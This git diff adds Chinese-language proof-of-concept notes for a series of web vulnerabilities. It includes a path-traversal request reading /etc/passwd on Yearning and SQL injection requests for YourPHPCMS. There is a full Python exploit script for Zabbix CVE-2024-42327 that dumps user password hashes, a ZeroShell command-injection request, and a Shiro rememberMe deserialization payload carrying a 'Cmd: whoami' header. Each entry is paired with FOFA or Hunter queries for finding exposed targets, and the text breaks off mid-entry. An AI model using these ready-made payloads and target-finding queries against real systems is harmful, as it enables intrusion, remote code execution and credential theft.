index 0000000..5f3bb09
--- /dev/null
+++ b/Yearningfront接口存在任意文件读取漏洞.md
@@ -0,0 +1,37 @@
+# Yearning front 接口存在任意文件读取漏洞
+
+# 一、漏洞简介
+Yearning是中国Henry Yee个人开发者的一个出色方便快捷的 Mysql SQL 审核平台。Yearning 2.3.1 版本、Interstellar GA 2.3.2 版本 和 Neptune 2.3.4 - 2.3.6 版本存在安全漏洞，该漏洞源于存在一个任意文件读取漏洞。攻击者可以利用该漏洞获取敏感信息。
+
+# 二、影响版本
++ Yearning
+
+# 三、资产测绘
++ hunter`app.name=="Yearning"`
++ 特征
+
+![1704942004441-16159972-ed25-4bab-a118-7fbef2545a8f.png](./img/KycX1QqFLArvj1s9/1704942004441-16159972-ed25-4bab-a118-7fbef2545a8f-013917.png)
+
+# 四、漏洞复现
+```java
+GET /front//%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd HTTP/2
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: cross-site
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+```
+
+![1704942049555-f29e7a81-a72a-4237-b2a4-b988bd6e3857.png](./img/KycX1QqFLArvj1s9/1704942049555-f29e7a81-a72a-4237-b2a4-b988bd6e3857-921144.png)[yearning-front-readfile.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222142312-c41a9525-b4d6-40ae-8332-da2f36609f9e.yaml)
+
+
+
+> 更新: 2024-02-29 23:55:42  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cvbgbkdvgfwckrxo>
\ No newline at end of file
diff --git a/YourPHPCMSRegister_checkEmail存在sql注入漏洞.md b/YourPHPCMSRegister_checkEmail存在sql注入漏洞.md
new file mode 100644
index 0000000..35fb7be
--- /dev/null
+++ b/YourPHPCMSRegister_checkEmail存在sql注入漏洞.md
@@ -0,0 +1,30 @@
+# YourPHPCMS Register_checkEmail存在sql注入漏洞
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.84);">YourPHPCMS Register_checkEmail存在sql注入漏洞</font>
+
+# <font style="color:rgba(0, 0, 0, 0.84);">二、影响版本</font>
++ YourPHPCMS
+
+# 三、资产测绘
+```rust
+header="YP_onlineid"
+```
+
+![1732274823092-2e4e8c5d-0bf0-4096-b2f6-966c88ac1dff.png](./img/Uobm7bh1TOAklZ7N/1732274823092-2e4e8c5d-0bf0-4096-b2f6-966c88ac1dff-887874.png)
+
+# 四、漏洞复现
+```rust
+GET /index.php?g=User&m=Register&a=checkEmail&userid=1&email=-69710348@nwcrb.com'+or+'1'='2" HTTP/1.1
+Host: 
+Accept: */*
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Accept-Encoding: gzip, deflate, br, zstd
+```
+
+![1732274798163-92c86972-4ab2-45b1-8ed0-efdd82c98664.png](./img/Uobm7bh1TOAklZ7N/1732274798163-92c86972-4ab2-45b1-8ed0-efdd82c98664-429686.png)
+
+
+
+> 更新: 2024-11-27 10:00:37  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/sgms1fg0nfgaavx3>
\ No newline at end of file
diff --git a/YourPHPCMSlogin_checkEmail存在sql注入漏洞.md b/YourPHPCMSlogin_checkEmail存在sql注入漏洞.md
new file mode 100644
index 0000000..d6b8ea3
--- /dev/null
+++ b/YourPHPCMSlogin_checkEmail存在sql注入漏洞.md
@@ -0,0 +1,30 @@
+# YourPHPCMS login_checkEmail存在sql注入漏洞
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.84);">YourPHPCMS login_checkEmail存在sql注入漏洞</font>
+
+# <font style="color:rgba(0, 0, 0, 0.84);">二、影响版本</font>
++ YourPHPCMS
+
+# 三、资产测绘
+```rust
+header="YP_onlineid"
+```
+
+![1732274946081-2fa7b36f-5b27-464c-899e-b80b63981e17.png](./img/RDkgNNSh_hl5-i_H/1732274946081-2fa7b36f-5b27-464c-899e-b80b63981e17-263714.png)
+
+# 四、漏洞复现
+```rust
+GET /index.php?g=Admin&m=Login&a=checkEmail&userid=1&email=-69710348@nwcrb.com'+or+'1'='2" HTTP/1.1
+Host: 
+Accept: */*
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Accept-Encoding: gzip, deflate, br, zstd
+```
+
+![1732274927301-ad8d704f-9b24-4757-a70a-01095646ed2a.png](./img/RDkgNNSh_hl5-i_H/1732274927301-ad8d704f-9b24-4757-a70a-01095646ed2a-852294.png)
+
+
+
+> 更新: 2024-11-27 10:00:37  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/edbg83z8v9qn2mic>
\ No newline at end of file
diff --git a/YourPHPCMS系统Register_checkEmail存在sql注入漏洞.md b/YourPHPCMS系统Register_checkEmail存在sql注入漏洞.md
new file mode 100644
index 0000000..43785af
--- /dev/null
+++ b/YourPHPCMS系统Register_checkEmail存在sql注入漏洞.md
@@ -0,0 +1,21 @@
+# YourPHPCMS系统Register_checkEmail存在sql注入漏洞
+YourPHPCMS login_checkEmail存在sql注入漏洞
+
+## fofa
+```rust
+header="YP_onlineid"
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1732274946081-2fa7b36f-5b27-464c-899e-b80b63981e17.png)
+
+## poc
+```rust
+GET /index.php?g=User&m=Register&a=checkEmail&userid=1&email=-69710348@nwcrb.com'+or+'1'='2" HTTP/1.1
+Host: 
+Accept: */*
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Accept-Encoding: gzip, deflate, br, zstd
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1732274798163-92c86972-4ab2-45b1-8ed0-efdd82c98664.png)
+
diff --git a/YourPHPCMS系统login_checkEmail存在sql注入漏洞.md b/YourPHPCMS系统login_checkEmail存在sql注入漏洞.md
new file mode 100644
index 0000000..cda8975
--- /dev/null
+++ b/YourPHPCMS系统login_checkEmail存在sql注入漏洞.md
@@ -0,0 +1,21 @@
+# YourPHPCMS系统login_checkEmail存在sql注入漏洞
+YourPHPCMS login_checkEmail存在sql注入漏洞
+
+## fofa
+```rust
+header="YP_onlineid"
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1732274946081-2fa7b36f-5b27-464c-899e-b80b63981e17.png)
+
+## poc
+```rust
+GET /index.php?g=Admin&m=Login&a=checkEmail&userid=1&email=-69710348@nwcrb.com'+or+'1'='2" HTTP/1.1
+Host: 
+Accept: */*
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Accept-Encoding: gzip, deflate, br, zstd
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1732274927301-ad8d704f-9b24-4757-a70a-01095646ed2a.png)
+
diff --git a/ZKBioSecurity存在shiro反序列漏洞.md b/ZKBioSecurity存在shiro反序列漏洞.md
new file mode 100644
index 0000000..edfbecf
--- /dev/null
+++ b/ZKBioSecurity存在shiro反序列漏洞.md
@@ -0,0 +1,19 @@
+# ZKBioSecurity存在shiro反序列漏洞
+
+ZKBioSecurity平台存在 shiro 反序列化漏洞，该漏洞源于软件存在硬编码的 shiro-key，攻击者可利用该 key 生成恶意的序列化数据，在服务器上执行任意代码，执行系统命令、或打入内存马等，获取服务器权限。
+
+## fofa
+
+```javascript
+title=="ZKBioSecurity" && body="Automatic login within two weeks"
+```
+
+## poc
+
+利用工具
+
+```
+https://github.com/SummerSec/ShiroAttack2/releases/tag/4.7.0
+```
+
+![image-20241106225639218](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411062256286.png)
\ No newline at end of file
diff --git a/Zabbix存在SQL注入漏洞(CVE-2024-42327).md b/Zabbix存在SQL注入漏洞(CVE-2024-42327).md
new file mode 100644
index 0000000..1ea8b79
--- /dev/null
+++ b/Zabbix存在SQL注入漏洞(CVE-2024-42327).md
@@ -0,0 +1,185 @@
+# Zabbix SQL注入漏洞(CVE-2024-42327)
+
+Zabbix 是一款开源的网络监控和报警系统，用于监视网络设备、服务器和应用程序的性能和可用性。
+
+Zabbix的addRelatedObjects函数中的CUser类中存在SQL注入，此函数由 CUser.get 函数调用，具有API访问权限的用户可利用造成越权访问高权限用户敏感信息以及执行恶意SQL语句等危害。
+
+## 影响版本
+
+```
+6.0.0 <= Zabbix <= 6.0.31
+6.4.0 <= Zabbix <= 6.4.16
+Zabbix 7.0.0
+```
+
+## poc
+
+```java
+POST /api_jsonrpc.php HTTP/1.1
+Host: 
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: close
+Content-Type: application/json-rpc
+Content-Length: 106
+
+{"jsonrpc": "2.0", "method": "user.login", "params": {"username": "Admin", "password": "zabbix"}, "id": 1}
+```
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412040952671.webp)
+
+```javascript
+POST /api_jsonrpc.php HTTP/1.1
+Host: 
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: close
+Content-Type: application/json-rpc
+Content-Length: 167
+
+{"jsonrpc": "2.0", "method": "user.get", "params": {"selectRole": ["roleid, u.passwd", "roleid"], "userids": "1"}, "auth": "40b23536324a2e3e872f0f446d7a11d0", "id": 1}
+```
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412040953059.webp)
+
+
+
+## python
+
+```python
+import requests
+import argparse
+
+"""
+Exploit Script for CVE-2024-42327
+Author: Alejandro Ramos (@aramosf)
+Assisted by: ChatGPT
+Date: 2024-12-01
+
+This script demonstrates the exploitation of the vulnerability CVE-2024-42327, 
+registered by Zabbix as ZBX-25623. This vulnerability allows unauthorized 
+access to sensitive user information by abusing the JSON-RPC API.
+
+References:
+- CVE: CVE-2024-42327
+- Zabbix Issue Tracker: https://support.zabbix.com/browse/ZBX-25623
+
+Functionality:
+1. Logs in to the Zabbix JSON-RPC API to obtain a session token using a valid username and password.
+2. Iterates over a range of user IDs (1 to 40), fetching user details for each ID.
+
+Arguments:
+- `-u` or `--url`: The API endpoint URL (e.g., http://192.168.201.128/api_jsonrpc.php).
+- `-n` or `--username`: The username for authentication.
+- `-p` or `--password`: The password for authentication.
+
+Example:
+python script.py -u "http://192.168.201.128/api_jsonrpc.php" -n "aramosf" -p "Hola1234"
+
+Disclaimer:
+This script is provided for educational purposes only. Unauthorized exploitation 
+of vulnerabilities is illegal and unethical. Use responsibly.
+"""
+
+def main(url, username, password):
+    # First request: Login to get the session token
+    headers = {
+        "Content-Type": "application/json-rpc"
+    }
+    login_data = {
+        "jsonrpc": "2.0",
+        "method": "user.login",
+        "params": {
+            "username": username,
+            "password": password
+        },
+        "id": 1
+    }
+
+    # Make the POST request for login
+    response = requests.post(url, json=login_data, headers=headers)
+
+    # Check if the login was successful
+    if response.status_code == 200:
+        login_result = response.json()
+        auth_token = login_result.get("result")  # Extract the session token
+
+        if auth_token:
+            print(f"Valid session token: {auth_token}")
+
+            # Loop over user IDs from 1 to 40
+            for userid in range(1, 41):
+                user_data = {
+                    "jsonrpc": "2.0",
+                    "method": "user.get",
+                    "params": {
+                        "selectRole": ["roleid, u.passwd", "roleid"],
+                        "userids": str(userid)  # Convert the user ID to a string
+                    },
+                    "auth": auth_token,
+                    "id": 1
+                }
+
+                # Make the POST request for each user ID
+                user_response = requests.post(url, json=user_data, headers=headers)
+
+                if user_response.status_code == 200:
+                    user_result = user_response.json()
+
+                    # Process the response to extract the desired fields
+                    if "result" in user_result and user_result["result"]:
+                        for user in user_result["result"]:
+                            username = user.get("username", "N/A")
+                            name = user.get("name", "N/A")
+                            surname = user.get("surname", "N/A")
+                            user_id = user.get("userid", "N/A")
+                            role_passwd = user.get("role", {}).get("passwd", "N/A")
+
+                            # Print only the requested fields, separated by commas
+                            print(f"{username}, {name}, {surname}, {user_id}, {role_passwd}")
+                else:
+                    print(f"Error in the request for user ID {userid}: {user_response.status_code}")
+                    print(user_response.text)
+        else:
+            print("Unable to retrieve a session token.")
+    else:
+        print(f"Error in login request: {response.status_code}")
+        print(response.text)
+
+
+if __name__ == "__main__":
+    # Parse command-line arguments
+    parser = argparse.ArgumentParser(
+        description=(
+            "Exploit script for CVE-2024-42327 (Zabbix vulnerability ZBX-25623). "
+            "Use to fetch user details from a Zabbix JSON-RPC API."
+        )
+    )
+    parser.add_argument("-u", "--url", required=True, help="The API endpoint URL.")
+    parser.add_argument("-n", "--username", required=True, help="The username for authentication.")
+    parser.add_argument("-p", "--password", required=True, help="The password for authentication.")
+    parser.add_argument(
+        "--example", action="store_true", help="Show an example usage of the script."
+    )
+
+    args = parser.parse_args()
+
+    # Display example usage if --example is passed
+    if args.example:
+        print(
+            "Example:\n"
+            "python script.py -u \"http://192.168.201.128/api_jsonrpc.php\" -n \"aramosf\" -p \"Hola1234\""
+        )
+    else:
+        # Run the main function with the provided arguments
+        main(args.url, args.username, args.password)
+
+```
+
+
+
+## 漏洞来源
+
+- https://github.com/aramosf/cve-2024-42327
+- https://mp.weixin.qq.com/s/H5KxVfdtAofcR1mC8IYqTw
+- https://mp.weixin.qq.com/s/Bfo-aZrVsNmOMtoONBpLzg
\ No newline at end of file
diff --git a/ZeroShell3.9.0远程命令执行漏洞(CVE-2019-12725).md b/ZeroShell3.9.0远程命令执行漏洞(CVE-2019-12725).md
new file mode 100644
index 0000000..7eeab35
--- /dev/null
+++ b/ZeroShell3.9.0远程命令执行漏洞(CVE-2019-12725).md
@@ -0,0 +1,37 @@
+# ZeroShell 3.9.0 远程命令执行漏洞(CVE-2019-12725)
+
+# 一、漏洞简介
+Zeroshell是一个微型的linux发行版本，它功能强大，具有强大的router、radius、web门户、防火墙、virtual**、Qos、 DHCP、dns转发等功能，可以用来安装到服务器上为内网提供网络服务。ZeroShell 3.9.0 存在命令执行漏洞，/cgi-bin/kerbynet 页面，x509type 参数过滤不严格，导致攻击者可执行任意命令。
+
+# 二、影响版本
++ ZeroShell < 3.9.0
+
+# 三、资产测绘
++ hunter`app.name="ZeroShell"`
++ 特征
+
+![1700238326883-4aa88d39-2cd9-4a09-bf76-20df4b3c1e85.png](./img/Qk7FY11KBJGYROTD/1700238326883-4aa88d39-2cd9-4a09-bf76-20df4b3c1e85-616604.png)
+
+# 四、漏洞复现
+```plain
+GET /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aid%0A%27 HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+```
+
+![1700238420978-583c020a-3c1f-4fe5-8518-a7752c20d39c.png](./img/Qk7FY11KBJGYROTD/1700238420978-583c020a-3c1f-4fe5-8518-a7752c20d39c-022453.png)
+
+
+
+> 更新: 2024-02-29 23:57:12  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cwidw8o3h26689ls>
\ No newline at end of file
diff --git a/Zkteco百傲瑞达安防管理系统平台存在shiro反序列化漏洞.md b/Zkteco百傲瑞达安防管理系统平台存在shiro反序列化漏洞.md
new file mode 100644
index 0000000..f09a7b4
--- /dev/null
+++ b/Zkteco百傲瑞达安防管理系统平台存在shiro反序列化漏洞.md
@@ -0,0 +1,34 @@
+# Zkteco百傲瑞达安防管理系统平台存在shiro反序列化漏洞
+
+# 一、漏洞简介
+Zkteco 百傲瑞达安防管理系统平台存在 shiro 反序列化漏洞，该漏洞源于软件存在硬编码的 shiro-key，攻击者可利用该 key 生成恶意的序列化数据，在服务器上执行任意代码，执行系统命令、或打入内存马等，获取服务器权限。
+
+# 二、影响版本
++ Zkteco 百傲瑞达安防管理系统平台
+
+# 三、资产测绘
++ fofa`app="ZKTECO-百傲瑞达安防管理系统平台" && title!="TimeTec Cloud AWDMS" && region="Sichuan"`
++ 特征
+
+![1702352620272-12a3898b-2866-434c-885f-754e214f8f53.png](./img/s6nWcxCRIR5Dn46Q/1702352620272-12a3898b-2866-434c-885f-754e214f8f53-977729.png)
+
+# 四、漏洞复现
+```plain
+GET / HTTP/1.1
+Host: {hostname}
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Cmd: whoami
+Cookie: rememberMe=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
+Accept-Encoding: gzip
+```
+
+![1702352669375-ed7bda99-7ba8-4437-937a-8fb896c3d529.png](./img/s6nWcxCRIR5Dn46Q/1702352669375-ed7bda99-7ba8-4437-937a-8fb896c3d529-930942.png)
+
+[LiquanKit.zip](https://www.yuque.com/attachments/yuque/0/2024/zip/1622799/1709222231764-3ceae87e-b392-4122-8a14-0f027c956689.zip)
+
+![1702352745177-9df046ec-c019-4e14-8376-23709ef9f9d1.png](./img/s6nWcxCRIR5Dn46Q/1702352745177-9df046ec-c019-4e14-8376-23709ef9f9d1-771497.png)
+
+
+
+> 更新: 2024-02-29 23:57:12  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cqpwl2rg9oco0hgf>
\ No newline at end of file
diff --git a/ZoneMinderindex存在SQL注入漏洞.md b/ZoneMinderindex存在SQL注入漏洞.md
new file mode 100644
index 0000000..4a31365
--- /dev/null
+++ b/ZoneMinderindex存在SQL注入漏洞.md
@@ -0,0 +1,28 @@
+# ZoneMinder index存在SQL注入漏洞
+
+# 一、漏洞简介
+ZoneMinder index存在SQL注入漏洞
+
+# 二、影响版本
++ ZoneMinder
+
+# 三、资产测绘
+```plain
+app="ZoneMinder"
+```
+
